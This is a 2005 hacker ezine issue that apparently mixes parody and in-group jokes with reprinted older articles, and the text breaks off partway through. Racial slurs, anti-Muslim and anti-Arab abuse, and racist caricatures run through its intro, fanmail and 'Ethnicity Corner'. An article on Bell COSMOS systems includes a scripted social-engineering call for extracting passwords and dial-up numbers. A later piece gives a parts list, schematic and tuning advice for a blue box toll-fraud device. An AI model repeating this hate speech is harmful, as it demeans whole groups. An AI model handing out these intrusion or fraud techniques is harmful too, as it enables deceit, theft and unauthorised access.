************ SPECIAL NOTE: CDEJ MEMBERSHIP ********************** CDEJ membership fee... $10,000 Getting an article in CDEJ ezine... $100,000 Being banned from nearly all efnet IRC channels... priceless. ***************************************************************** l'elephant avec les trunks huge izzue three Special Christmas Edition 2005 * /\ / \ ___ / | __ / \|____|/ \ / / __ \ \ <--- h0h0h0! / | Oo | \ \___/| |\___/\ | |_| |_| \ | |/|__|\| \ | |__| |\ | |__| |_/ / \ | @ | | @ || @ | ' | |~~| || | -J. Elephant- 'ooo' 'ooo''ooo' "CDEJ -hack the planet" LAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLA *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** * *CDEJ is so elite* * * *Dirty Field trips in the palestinian camps* * * *Secrets of the underground* * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=** * * * o0o honorary editor of this issue: o0o * * -monkey longarm <:D> * * * **=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.** * * * Christmas times! * * To all of you people who don't celebrate Christams * * for the following reasons: * * - being m*slim (we still refuse to pronounce it) * * - being atheist :-o> * * - getting drunk on the 23rd and never wake up untill it's * * too late * * - commies and jew haters in deep denial * * * * "WE DON"T GIVE A FUCK!" * **=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.** *our newest member: m4ch14v3lli * * "french are women" * * * *pet of the month: Jessie QUACKSON * * Bird Flue infected Duck * * * *MONTHLY ASCII: -=:-o <-- teh efnet thug ascii * * originally invented by hunt3rx * * legal rights bought by CDEJ * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** * it's good to see some journalistic integrity within* * the community once again * * * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** * h0h0h0! * * nigger! * * I saw a tactical nuclear missle disintegrate a car * * and was like lol * *=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.** - "Feels like a deja vue!" -Ariel Sharon (on the 9th of december 2005, while supervising an Air Strike simulation of the forthcoming bombing of the IRANian Nuclear Fertilisation Base Camp) *** Dictionary of Extended ASCII Art *** :D? Thinking :? Thinking deeply @:D> Pilsbury Doughboy o< Duck (with or without bird flu) :<~ Runny nose (possibly from bird flu) :D~ Fluid coming from mouth 8D Coke / Crack addict x:F Same teeth as my cat X:D Needs a haircut x:D Just got a haircut :-O> The Scream >:D< The hug {:-) Jim Carry @:D Conan Obrian #:-) Lenny Kravitz ]:-) A texan Hacker :-)% wearing ma's perl when alone at her room :-O> ¦-)>< wearing dad's tox *<:-)>> Santa cause it's christmas times! >:D< (note to self: "don't forget to delete the ma's perl before posting") [.]................................................................[.] [x]....................[ issue # 3 15/12]..........................[x] [.]................................................................[.] [x]=[000] intro Monkey Longarms <:D> [x] [.]................................................................[.] [x]=[001] The Novel - trans :D? [x] [.]................................................................[.] [x]=[002] COSMOS - King Arthur [x] [.]................................................................[.] [x]=[003] Blue Box reinvented - Jester Sluggo [x] [.]................................................................[.] [x]=[004] linux-ftpd-ssl 0.17 remote root exploit -dumb0 (0day) [x] [.]................................................................[.] [x]=[005] Bluetooth sobexsrv remote syslog() exploit - set_ (0day)[x] [.]................................................................[.] [x]=[006] Outro Note - w01f [x] [.]................................................................[.] [000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0x00] Staff: @:D X:D <(Hair's too long) x:D <(Ok now I got a haircut that's better) <:D> --< Introduction >-- Monkey Longarms <:D> Hey guys. Today I'd like to include some beautiful poetry from one of our affilate haqrs, trans. It is so beautiful :.) I encourage you all to send your poetry in so that I can post it to the world! If your poetry is posted, and then I get struck by lightning twice in the same day (and live), you win $100! drew a cat and a cupcake emoticons and said it was the kitty's birthday in a javachat and these other people drew cakes HAPPY BIRTHDAY KITTY It is so nice. Guys I'd like to talk about a serious issue now. This is issue of bird flu. I have done some interviews with various birds and they all say the same thing: this issue needs more attention. White, capitalist, republican Americans (being inherantly bad :-o war is so bad donut hurt us! donut eat meat!) have injected birds with bird flu (just like they injected africans with aids (after which africans subsequently 'injected' it into one another!)). Here is an interview with a prominent duck activist, Jesse Quackson, taken from IRC. Thanks for having me. You owe me. Ok, now tell us about how the evil republicans are oppressing your people. First of all, we have to work for a living. This is bad. White humans have been eating us for years, so we should get everything free, and be able to sit on ponds doing nothing for the rest of our lives. Talk about birdflu please k.thx Basically I am convinced that white republican americans injected us with bird flu and now refuse to provide us with adequate amounts of theraflu(TM). Have any proof? Yes. They make more money than us. More of them go to school than us. They live longer. This is clearly prejudiced. Have you ever tried to get a job? That is not the point. They OWE me. Change the subject. Keep talking about bird flu. So like, what would you like americans to do about the bird flu problem? Give us reperations. Give us all lots of ponds. How will this solve your birdflu problem? I'm sorry I have to go. FREE KEVIN Ok as you can see nothing really came out of this. Today we have a nice issue for you. The next b4b0 has not come out yet, so we're lacking technical articles. Let's go to the fanmail. --< Fanmail >-- CDEJ Staff Dear cdej - Hey guys this zine is kewl! When I was a kid I haqd 234432 stock market computers in the same day. Then I wore trendy european clothing and went to raves in new york. I am a tru haqr. Can I be in yer club? -- zero kewl -=-=-=-=-=-=-=-=-=-=-=-=-=-=- THIS IS AN AUTOMATICALLY GENERATED EMAIL. PLEASE DO NOT RESPOND. Dear zero kewl - Thank you for your interest in cdej! Every cdej canidate member goes through a long, intensive screening process. Please begin by filling out the membership application. It is 112 pages long and can be obtained from #cdej/efnet. After you submit the application, a cdej member will contact you in 10-12 months. If accepted into further screening, you will be sent to the cdej screening center in Quantico, VA. Here you will undergo some of the most stringent physical and mental training on the planet. Out of the 10,000 people that make it into this training every year, only 2 make it through. Once through screening, you will be required to attend the advanced astronaut training program at cape canaveral, FL, explosive ordnance school in Kandahar, Afghanistan, and cia school in Langley, VA. You will then be eligible for consideration by top ranking cdej members! ----------------------------------------- Dear cdej - Hey guys can you please help me perform acts of terrorism? -- name withheld -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Dear name withheld - CDEJ works with the CIA and FBI, as well as the DHS, to locate and capture m*slim terrorist scum. In fact, we have our own 'interogation' center (located in various boxcars along the nation's railways) free from the restrictions these other agencies have. In short, we will use the email headers to trace and haq yer computer machine, then lock you up in a train and show you videos of us haqing arabz. --< CDEJ Prophile: trans >-- CDEJ staff (monkey longarms) Name: trans Age: 62 Job: haqr Home: Beirut Lebanon Car: Don't have one Pet: Ostrich Girl: Don't have one Comp: Don't have one Favorite haqr experience: "When I broke into secret computer machines and then had to go to jail for a night. I haqd the locks of the prison and then got out scot-free!" --< CDEJ: The Novel -- An Epic Tale of Haqing Computer Machines >-- :D? mystery author :D? Is it stephen king who knows :? >-- Or maybe it is just trans? 1 - Bad news in the Morning I woke up about 11:30am, to the muffled sound of mom sweatin' to the oldies in the living room. Since I was unemployed, I laid in bed for about another 2 hours, enjoying the small glints of Monday sun that filtered through the various rips in the black garbage bags that covered my bedroom's windows. Arising finally from bed, ignoring the familiar clanking and clacking sounds caused by debris falling from my blankets onto the floor, I lit a cigarette and set out on my daily routine. I stretched and walked over to the corner of the room, where a card table functioned as an improvised computer desk. The 486SX whired to life after I hit the switch; I sat down. Simultaneously booting up and spitting on the carpet, I watched the BIOS routines take their time counting memory. I could still hear mom out in the living room. It was a bummer that she'd been out of the job. I had to deal with her soap operas and boyfriends all day long. I found a slice of pizza somewhere on the table and munched down. Within a few minutes I was in what us computer experts call the 'brain' of the computer: the Disk Operating System (or DOS). You really couldn't claim to be an expert in computers without knowing a few DOS commands. In fact, I was more inclined to work from a DOS prompt than the Windows GUI, just to kind of make myself feel a little more elite. Basking in the warm glow of my talents, I typed a few commands. ------------------------------------------------------------ Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\trans> DI 'DI' is not recognized as an internal or external command, operable program or batch file. C:\Documents and Settings\trans>dir Volume in drive C is elitehaqr Volume Serial Number is 7625-8432 Directory of C:\Documents and Settings\SpecialJ 06/27/2004 12:04 AM . 06/27/2004 12:04 AM .. 11/21/2005 02:09 PM Desktop 11/03/2005 06:06 PM Favorites 06/28/2004 03:17 PM My Documents 07/22/2005 04:11 PM kodez 08/12/2005 11:12 AM winnuke 08/12/2005 03:55 AM ircdox 07/25/2005 11:55 PM warez 11/19/2005 03:15 PM wildcat 06/10/2004 08:20 PM Start Menu 0 File(s) 0 bytes 11 Dir(s) 12,540,416 bytes free C:\Documents and Settings\SpecialJ>netstat -an Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:* UDP 0.0.0.0:1025 *:* C:\Documents and Settings\SpecialJ> ------------------------------------------------------------ This last bit of information surprised me. There were ports open on my computer. I'd spent a considerable amount of time over the past 6 months studying computers, and I knew immediately that this meant I was infected. Infected, as most hackers know, is computer lingo for having a virus. I moved a hardcopy of CDEJ #2 off the cardtable and onto the floor using a dramatic forearm sweeping motion, and picked up my lit cigarette (which had already burned a part of my mouse cord). I got to work. ------------------------------------------------------------ /join #cdej hey guys I have some ports open can any of you help me? I had ports one time I think you need to reformat, i had to but then I reinstalled and there were still ports make sure your windows cdrom isn't hacked like mine /join #hack hey guys I have some ports open can any of you help me? ** You were kicked from #hack by lothos (PhD in social engineering) ------------------------------------------------------------ LoU member lothos (notorious for his GSM frequency memorization skills) had reacted violently to my innocuous question. LoU *had* to be involved with this. These guys were as good as it gets. They were even rumored to know some basic Unix, and have a history with exotic, baffling technologies such as DDoS and warez. I had to be careful. Everyone knows that you can't just go out and bust LoU without proper planning. I mean, they're basically LoD! They copied off the name (another 'legions of'), and their premier member 'optik lenz' obviously ripped his nick from phiber optik. They constantly write technically asinine articles to cover up their eliteness with a fog of misperception. They were so elite they didn't *need* to be creative or smart, so they purposely appeared to outsiders as total morons. Some friends of mine were going to be over at 8pm to play role playing games. I had 8 hours. I pulled on my wife beater I downloaded winnuke. I started mIRC again (it had crashed). I put the movie 'Hackers' into my BetaMax player. I turned on some 'techno' music. I took out the trash. I was ready to do my first hack. ... but first, I needed some food. 2 - The Mean Streets I had to go to the store to get something to eat. I had about $20 worth of foodstamps left, and it had to last me the rest of the month. As I opened the front door, overdue notices and electricity bills drifted to the ground like snowflakes. "Obviously", I thought to myself, "If I don't take the first one inside, I'm not likely to take in the next 100." I walked to the supermarket because our car had been up on blocks for a few weeks, and probably wasn't going to be starting any time soon. I had to hang outside the store for a couple hours because the lame assistant manager kid wouldn't let me in wearing just my wife beater and jeans. So I sat on the curb until I met a buddy of mine, who loaned me his shirt. I bought some snickers bars and a PC Gamer magazine. Down isle 3 (feminine products, baby food, and hamburger helper) some girls started kinda pointing and laughing to themselves. I waved at them to give them a little thrill. I'm good with the ladies. Anyway I grabbed my stuff and headed out the door. My friend was still out there, so we went over to his house and smoked some doobz for about 2 weeks. When I finally stumbled home, I had completely forgotten about LoU and my haqr project and everything else. The day was dark and drizzly. It was typical late November weather; brown leaves lined the sidewalks. Their sweet smell of decay permeated the air. The crows, being especially stuburn this year, were the only birds in sight. Their menacing 'caw' could be heard periodically through my bedroom window and wallboards, which had gaping holes between them. Thunder announced itself. It would snow soon; the color of the sky and my internal barometer left no doubt about this. It was getting dark. Something told me that today, a seemingly normal though somewhat cool, autumn day would be different than any other day that I'd ever lived. This turned out to be incorrect. 3 - :D? What was I doing? :? It is a mystery. Eventually my mom paid the AOL and electricity bills and I got back on mirc. After spending some time interested in Poke'mon and pogs, I remembered the ports on my computer and logged back in to what many in the community consider to be the heart of the haqr community: #cdej/efnet. ------------------------------------------------------------ hi hi welcome! Hey! Shalom [ ... always such a warm welcome :.) ] can someone help me haq LoU? I have a botnet we can DDoS them really? yeah I used it on my mom when I found out she was arab ** the_sniff was kicked by w01f (no arabs allowed) dood i need his k0dez ------------------------------------------------------------ So to make a long story short the_sniff didn't really have a botnet but was just lying to try to attain the rank of captain in CDEJ. I was back to square 1. This frustration, coupled with the annoying draft caused by a 2" hole in the floor, nearly drove me over the edge. The anger passed, leaving in its place a good idea: social engineering! ------------------------------------------------------------ /join #lou trans (~nsync1985@aol.com) has joined #lou *** trans is now known as kmitnick oohhh fear! hey guys kevin mitnick here hey mr mitnick! i was hoping you guys could help me out do you know the GSM frequencies for your nation? sure what can we help you with? /msg optiklenz dood dig this looser haha what looser is that? some lamer? i need access to you computer machines to do some secret haqing project involving yahoo chat sure. try 127.0.0.1, login: loozer pass: l4m3r SUCKERS! ./quit /quit ------------------------------------------------------------ They had fell for it. LoU member lothos was convinced that I was kevin mitnick, a great haqr in the lineup of great haqrs: caroline meinel, e.goldstein (they say he molests children but I don't believe them!), and all the great tallented people in cDc (phear wintrojanz! phear pcanywhere!) With these kodez, I was set. In the words of the great dade murphy: "I'm in". If this LoU computer, no doubt residing somewhere deep in the basement of lothos' mom's house, had ports on it, I could haq it. I was a big fan of 'the happy hacker' and other CPM literature, and had read all the guides to mostly harmless hacking. I was well acquainted with telnet and port surfing. I began. C:\> telnet 127.0.0.1 79 connection closed by remote host They had a firewall. I had to be more creative. C:\> ping 127.0.0.1 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.073 ms ^C Ok I could ping flood them. This is kind of like winnuke, but not traceable. I decided instead to wait and collect more intel. After all, you can't just go busting down doors without knowing what's up. Plus, my mom's check to the power company bounced. Anyway, I don't think that LoU will be bothering me anymore, since I have their ip address and they have ports. Some of them use unix even though it's obsolete, but I'm pretty sure that's only optik lenz and i don't want to deltree him anyway. --< Ethnicity Corner >-- Longarms We here at CDEJ have decided to be a little more culturally sensitive. To push this along, we've dedicated one section of each issue to topics that highlight haqrs of non-white race, non-western background, and non- English language. In other words, it's time for us to be prejudiced against white Americans for once! Just like the NAACP! Today's Ethnicity Corner subject is T'so T'sing T'su, a Chinese hacker. He will share some of his hacking experiences in the Min-Xing Valley! ---------------------- Hello! I T'so T'sing T'su, I called T'so shortly. Thank you very much for hearing my list experiences of hacking abacus and computer in the Chinese farm where I am farmer and student of engineering. I hope that you can learn various culture hackers from this paper of experience! In MinXing valley we have not many computer, because communist government require all people over 5 year work in farm for 18 hours each today. I am lucky child with computer and spend much hour on internet every weekend when mother is at market. I have learned hacking technique from cdej and other internet hacker that is rivaled to my kung fu technique. cdej also know kung fu so they are friend. Monkey longarm has monkey technique, trans has crane technique (with much crank kicking and banning), and lozcar has also technique of arab rabit. In china we have much doing with families and neighborhood rice and sushi and judo and declaring war on north korea. We are busy peoples but i take the time now then to study western culture of computer with lemonade and virus of visual basic. Thank you much and please adopt me! --------------------- In a sad note, T'so was killed 3 days after emailing us this. This note was intercepted by the communist Chinese government, and they felt that he had revealed too much information about his country. So sad :.( NOTE: W01f and trans are NOT the same person, but two seperate people. In fact, each of us has 3 or 4 distinct personalities. Case solved. (Also trans is the little brother of w01f). TODO: - register plskthx.com COSMOS COmputer System for Mainframe OperationS Part One by King Arthur Introduction %%%%%%%%%%%% Throughout the last decade, computers have played an ever growing role in information storage and retrieval. In most companies, computerized databases have replaced a majority of all paper records. Where in the past it would take 10 minutes for someone to search through stacks of paper for some data, the same information can now be retrieved from a computer in a fraction of a second. Previously, proprietary information could be considered "safe" in a file cabinet; the only way to see the data would be to have physical access to the files. Now, somebody with a computer terminal and a modem can make a quick phone call and access private records. It's unfortunate that there are "hackers" who try to gain unauthorized access to computers. Yet, it is just as unfortunate that most reported computer break-ins could have been prevented if more thought and common sense went into protecting computers. Hackers %%%%%%% There have been many cases of computer crime reported by the Bell Operating Companies (BOCs), but it is hard to say how many actual break-ins there are. Keep in mind that the only reported cases are those which are detected. In an interview with an anonymous hacker, I was told of one of the break-ins that may not have ever been reported. "My friend got the number when he misdialed his business office -- that's how we knew that it was the phone company's. It seems this Unix was part of some real big Bellcore computer network," says the hacker. The hacker explains that this system was one of many systems used by the various BOCs to allow large Centrex customers to rearrange their Centrex groups. It seems he found a text file on the system with telephone numbers and passwords for some of Bellcore's development systems. "On this Bellcore system in Jersey, called CCRS, we found a list of 20 some-odd COSMOS systems.... Numbers, passwords, and wire centers from all over the country!" He adds, "Five states to be exact." The hacker was able to gain access to the original Unix system because, as he says, "Those guys left all the default passwords working." He was able to login with a user name of "games" with the password being "games." "Once we were on we found that a large number of accounts didn't have passwords. Mary, John, test, banana, and system were some, to name a few." From there he was able to eventually access several COSMOS database systems -- with access to ALL system files and resources. COSMOS %%%%%% COSMOS, an acronym for the COmputer System for Mainframe OperationS, is a database package currently supported by Bellcore. COSMOS is presently being used by every BOC, as well as by Cincinnati Bell and Rochester Telephone. COSMOS replaces paper record-keeping and other mechanized record systems for plant administration. COSMOS' original purpose was to alleviate congestion in the Main Distributing Frame (MDF) by maintaining the shortest jumpers. It can now maintain load balance in a switch and assign office equipment, tie pairs, bridge lifters and the like. Additional applications allow COSMOS to aid in "cutting-over" a new switch, or even generate recent change messages to be input into electronic switches. COSMOS is most often used for provisioning new service and maintaining existing service, by the following departments: The frame room (MDF), the Loop Assignment Center (LAC), the Recent Change Memory Assistance Center (RCMAC), the network administration center, and the repair service. Next year COSMOS will celebrate its 15th birthday, which is quite an accomplishment for a computer program. The first version or "generic" of COSMOS was released by Bell Laboratories in 1974. In March 1974, New Jersey Bell was the first company to run COSMOS, in Passaic, New Jersey. Pacific Telesis, NYNEX, Southern Bell, and many of the other BOCs adopted COSMOS soon after. Whereas Southwestern Bell waited until 1977, the Passaic, NJ Wire Center is still running COSMOS today. Originally COSMOS ran on the DEC PDP 11/45 minicomputer. The package was written in Fortran, and ran the COSNIX operating system. Later it was adapted to run on the DEC PDP 11/70, a larger machine. Beverly Cruse, member of Technical Staff, COSMOS system design at Bellcore, says, "COSNIX is a derivation of Unix 1.0, it started out from the original Unix, but it was adapted for use on the COSMOS project. It bears many similarities to Unix, but more to the early versions of Unix than the current... The COSMOS application now runs on other hardware understandard Unix." "The newest version of COSMOS runs on the standard Unix System V operating system. We will certify it for use on particular processors, based on the needs of our clients," says Ed Pinnes, the District Manager of COSMOS system design at Bellcore. This Unix version of COSMOS was written in C language. Currently, COSMOS is available for use on the AT&T 3B20 supermini computer, running under the Unix System V operating system. "There are over 700 COSMOS systems total, of which a vast majority are DEC PDP 11/70's. The number fluctuates all the time, as companies are starting to replace 11/70's with the other machines," says Cruse. In 1981 Bell Laboratories introduced an integrated systems package for telephone companies called the Facility Assignment Control System (FACS). FACS is a network of systems that exchanges information on a regular basis. These are: COSMOS, Loop Facilities Assignment and Control System (LFACS), Service Order Analysis and Control (SOAC), and Work Manager (WM). A service order from the business office is input in to SOAC. SOAC analyzes the order and then sends an assignment request, via the WM, to LFACS. WM acts as a packet switch, sending messages between the other components of FACS. LFACS assigns distribution plant facilities (cables, terminals, etc.) and sends the order back to SOAC. After SOAC receives the information form LFACS, it sends an assignment request to COSMOS. COSMOS responds with data for assigning central office equipment: Switching equipment, transmission equipment, bridge lifters, and the like. SOAC takes all the information from LFACS and COSMOS and appends it to the service order, and sends the service order on its way. Computer Security %%%%%%%%%%%%%%%%% Telephone companies seem to take the brunt of unauthorized access attempts. The sheer number of employees and size of most telephone companies makes it very difficult to keep tabs on everyone and everything. While researching computer security, it has become evident that COSMOS is a large target for hackers. "The number of COSMOS systems around, with dial-ups on most of the machines... makes for a lot of possible break-ins," says Cruse. This is why it's all the more important for companies to learn how to protect themselves. "COSMOS is power, the whole thing is a big power trip, man. It's like Big Brother -- you see the number of some dude you don't like in the computer. You make a service order to disconnect it; COSMOS is too stupid to tell you from a real telco dude," says one hacker. "I think they get what they deserve: There's a serious dearth of security out there. If kids like us can get access this easily, think about the real enemy -- the Russians," jokes another. A majority of unauthorized access attempts can be traced back to an oversight on the part of the system operators; and just as many are the fault of the systems' users. If you can keep one step ahead of the hackers, recognize these problems now, and keep an eye out for similar weaknesses, you can save your company a lot of trouble. A hacker says, "In California, a friend of mine used to be able to find passwords in the garbage. The computer was supposed to print some garbled characters on top of the password. Instead the password would print out AFTER the garbled characters." Some COSMOS users have half duplex printing terminals. At the password prompt COSMOS is supposed to print a series of characters and then send backspaces. Then the user would enter his or her password. When the password is printed on top of the other characters, you can't see what it is. If the password is being printed after the other characters, then the printing terminal is not receiving the back space characters properly. Another big problem is lack of password security. As mentioned before, regarding CCRS, many accounts on some systems will lack passwords. "On COSMOS there are these standardized account names. It makes it easier for system operators to keep track of who's using the system. For instance: all accounts that belong to the frame room will have an MF in them. Like MF01, you can tell it belongs to the frame room. (MF stands for Main Frame.) Most of these names seem to be common to most COSMOS systems everywhere. In one city, none of these user accounts have passwords. All you need is the name of the account and you're in. In another city, which will remain unnamed, the passwords are the SAME AS THE DAMN NAMES! Like, MF01 has a password of MF01. These guys must not be very serious about security." One of the biggest and in my eyes one of the scariest problems around is what hackers refer to as "social engineering". Social engineering is basically the act of impersonating somebody else for the sake of gaining proprietary information. "I know this guy. He can trick anybody, does the best BS job I've ever seen. He'll call up a telco office, like the repair service bureau, that uses COSMOS. We found that most clerks at the repair service aren't too sharp." The hacker said the conversation would usually take the following course: Hacker: Hi, this is Frank, from the COSMOS computer center. We've had a problem with our records, and I'm wondering if you could help me? Telco: Oh, what seems to be the problem? H: We seem to have lost some user data. Hopefully, if I can correct the problem, you people won't lose any access time today. Could you tell me what your system login name is? T: Well, the one I use is RS01. H: Hmm, this could present a problem. Can you tell me what password and wire center you use that with? T: Well, I just type s-u-c-k-e-r for my password, and my wire centers are: TK, KL, GL, and PK. H: Do you call into the system, or do you only have direct connect terminals? T: Well, when I turn on my machine I get a direct hook up. It just tells me to login. But I know in the back they have to dial something. Hold on, let me check. (3 Minutes later...) Well, she says all she does is call 555-1212. H: OK, I think I have everything taken care of. Thanks, have a nice day. T: Good, so I'm not gonna have any problems? H: No, but if you do just give the computer center a call, and we'll take care of it. T: Oh, thank you honey. Have a nice day now. "It doesn't work all the time, but we get away with it a good part of the time. I guess they just don't expect a call from someone who isn't really part of their company," says the hacker. "I once social engineered the COSMOS control center. They gave me dial-ups for several systems, and even gave me one password. I told them I was calling from the RCMAC and I was having trouble logging into COSMOS," says another. This last problem illustrates a perfect example of what I mean when I say these problems can be prevented if more care and common sense went into computer security. "Sometimes, if we want to get in to COSMOS, but we don't have the password, we call a COSMOS dial-up at about 5 o'clock. To logoff of COSMOS you have to hit a CONTROL-Y. If you don't, the next person who calls will resume where you left off. A lot of the time, people forget to logoff. They just turn their terminals off, in the rush of going home." The past examples do not comprise the only way hackers get into systems, but most of the problems shown here can exist regardless of what types of systems your company has. The second article deals with solutions to these problems. +--------------------------------+ | Building Your Own Blue Box | +--------------------------------+ | By | | Jester Sluggo | | Released: Nov. 27, 1986 | +--------------------------------+ This Blue Box is based on the Exar 2207 Voltage Controlled Oscillator. There are other ways to build Blue Boxes, some being better and some not as good, but I chose to do it this way. My reason for doing so: because at the time I started this project, about the only schematic available on BBS's was the one written by Mr. America and Nickie Halflinger. Those plans soon (in about 90 seconds) became very vague in their context with a couple in- consistencies, but I decided to "rough it out" using those plans (based on the Exar 2207 VCO) and build the Blue Box using that as my guide. During the construction of the Blue Box, I decided to type-up a "more complete and clear" set of Blue Box schematics than the file that I based mine on, in order to help others who may be trying/thinking of building a Blue Box. I hope these help. Note: You should get a copy of the Mr. America/Nickie Halflinger Blue Box plans. Those plans may be of help to anyone who may have difficulty understanding these plans. Also, these plans currently do not support CCITT. +---------------------------------+ | Why should I build a Blue Box ? | +---------------------------------+ Many of you may have that question, and here's my answer. Blue Boxing was the origin of phreaking (excluding whistling). Without the advent of Blue Boxes, I feel that some of the advances in the telecommunications industry would've taken longer to develop (The need to stop the phone phreaks forced AT+T Bell Laboratories to "step up" their development to stop those thieves!). There is no harm in building a Blue Box (except the knowledge you will gain in the field of electronics). Although there are software programs (Soft Blue Boxes) available for many micro's that will produce the Blue Box Multi-Frequency (MF) tones, they are not as portable as an actual Blue Box (you can't carry your computer to a telephone, so you must use it from home which could possibly lead to danger). Many phreaks are announcing the end of the Blue Box Era, but due to discoveries I have made (even on ESS 1A and possibly ESS 5), I do not believe this to be true. Although many people consider Blue Boxing "a pain in the ass", I consider Blue Boxing to be "phreaking in its' purest form". There is much to learn on the current fone network that has not been written about, and Blue Boxes are necessary for some of these discoveries. The gift of free fone calls tends to be a bonus. Note: Blue Boxes also make great Christmas gifts! +---------------------------------------+ | Items needed to construct a Blue Box. | +---------------------------------------+ Here is the list of items you will need and where you can get them. It may be a good idea to gather some of the key parts (the chips, and especially the potentiometers, they took about 6 months to back order through Digi-key. A whole 6 fucking months!) before you start this project. Also, basic electronics tools will be necessary, and you might want to test the circuit on a bread board, then wire-wrap the final project. Also, you will need a box of some sort to put it in (like the blue plastic kind at Radio Shack that cost around $5.00). Note: An oscilliscope should be used when tuning in the potentiometers because the Bell system allows only a 7-10% tolerance in the precision of the frequencies. Qty. Item Part No. Place --------------------------------------------------- 1 | 4 x 4 Keypad | | Digi-Key 6 | Inverter Chip | 74C04 | 32 | Potentiometer | | 1 | 4-16 Converter Chip| 74LS154 | 1 | 16 Key Decoder | 74C922 | 2 | 2207 VCO | XR2207CP | Exar Corp. 3 | .01 uf Capacitor | 272-1051 | Radio Shack 5 | .1 uf Capacitor | 272-135 | Radio Shack 2 | 1.5K Ohn Resistor | | Radio Shack 2 | 1.0K Ohm Resistor | | Radio Shack 1 | Speaker | | From an old Autovon fone. 1 | 9 Volt Battery | | Anywhere The resistors should be a +/- 5% tolerance. The speaker can be from a regular telephone (mine just happened to be from an old Autovon phone). But make sure that you remove the diode. The Potentiometers should have a 100K Ohm range (but you may want to make the calculations yourself to double check). The 9-volt battery can be obtained for free if you use your Radio Shack Free Battery Club card. The Exar 2207 VCO can be found if you call the Exar Corp. located in Sunnyvale, California. Call them, and tell them the state you live in, and they'll give the name and phone number to the distributor that is located closest to you. The 2207 will vary from about $3.00 for the silicon-grade (which is the one you'll want to use) to about $12.00 for the high-grade Military chip. Note: When you call Exar, you may want to ask them to send you the spec-sheets that gives greater detail as to the operation and construction of the chip. +-------------------+ | Schematic Diagram | +-------------------+ +--------------+ +-------------+ | 1 2 3 A | | Figure #1 | | 4 5 6 B | +-------------+ | 7 8 9 C | | Logic Side | | * 0 # D | +-------------+ ++-+-+-+-+-+-+-+ 1 | 3 | 5 | 7 | (VCC) | 2 | 4 | 6 | 8 (+5 Volts) +----+ | | | | | | | | [+] | _|_ | | | | | | | | | | X_/GND +--+-+-+-+-+-+-+-+----+ +--+----------+---+ | 2 | 11| 10| 7 | | | 14 7 | (.01C) | | 3 | 4 | 8 | 1 12+------+1 | +--||---+5 13+------+2 (*74C04*) | _|_ | | | | X_/GND | (*74C922*) | +-----------------+ +--||-+6 | |(.1C)| | _|_ | | X_/GND | 9 17 16 15 14 18| +--+--+--+--+--+---+--+ | | | | | | _|_ A B C D | GNDX_/ | | | | [+] (VCC) [+] (VCC) | | | | (+5 volts) | (+5 volts) | | | | | -------+--+--+--+------------------+----------------- | 23 22 21 20 24 18+-+ +-----+12 | +--+ | | (*74LS154*) 19+-+ _|_ _|_ | | X_/ X_/GND | 1 2 3 4 5 6 7 8 9 10 11 13 14 15 16 17 | GND +--+--+--+--+--+--+--+--+--+-+--+--+--+--+--+--+----+ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | | | | | | | | | | | | | | | | | (Connects) | +----------> +------------------------+ | (Figure 2) | +--+ +-------+ | | | | +--+-------+--+-------+---+ | 3--|>o--4 5--|>o--6 | | (Invtr.) (Invtr.) | +---------------+7 | _|_ | (*74C04*) | GNDX_/ (VCC) [+]--+14 | (+5 volts) | | +-------------------------+ +-------------+ _ | Figure #2 | / | +---+-------------+----+ +----------------+ | | Tone Generation Side | _|_ | | SPKR +----------------------+ GNDX_/ +---+--+---+ | | | X_| | | | | +---------------+ +-------+ | | | | | _|_ | +--+14 | | X_/GND | | (Repeat of) | | | | (First) | ----- (.1C) | | (Circuit) | ----- | | | | | | (*XR2207CP*) | | +-----------------+ | +--+6 | | | | | | | | [+]-----+-------+1 14+--+ | +---------------+ (VCC) | | +--------------------+ (+9 Volts) +----+2 | | | | 12+---------------------+ | (.01C) ----- | | _|_ | ----- | (*XR2207CP*) | X_/GND | | | | 1.5K Ohms | +----+3 11+---+---X/XRx/X/---+--+ | | | | | _|_ | | | +---X/XRx/X/---+ X_/GND | | | 1.0K Ohms | | 10+----+ | +-------------+6 9+----+---+ | | | 8+----+ | | | | | ----- (.1C) | | +-----------------+ ----- | +---------+ _|_ +----------+ | | Pot. GNDX_/ Pot. | | | X/X/X/X/--+-----------------------X/X/X/X/ | | 1400 Hz. | 1600 Hz. | +---------+ | +----------+ | | Pot. | Pot. | | | X/X/X/X/--+----------------+------X/X/X/X/ | | 1500 Hz. | | 900 Hz. | | | | | | 14 more | | 14 More | | Potentiometers | | Potentiometers | | in this | | in this | | area left out | | area left out | | for simplicity | | for simplicity | | | | | | | | | | (Connects) | <-------------+ (Figure 1) +-------------------------+ | Multiplex Keypad System | +-------------------------+ First, the multiplex pattern used in the 4x4 keypad layout. I suggest that keys 0-9 be used as the Blue Box's 0-9 keys, and then you can assign A-D, *, # keys to your comfort (ie. * = Kp, # = St, D = 2600, and A-C as Kp1, Kp2 or however you want). Note: On your 2600 Hz. key (The D key in example above) it may be a good idea to tune in a second potentiometer to 3700 Hz. (Pink Noise). Keypad Key Assignments Multiplex Pattern +---------+ +-------------+ +------------+ | 1 2 3 A | | 1 2 3 4 | | 1 2 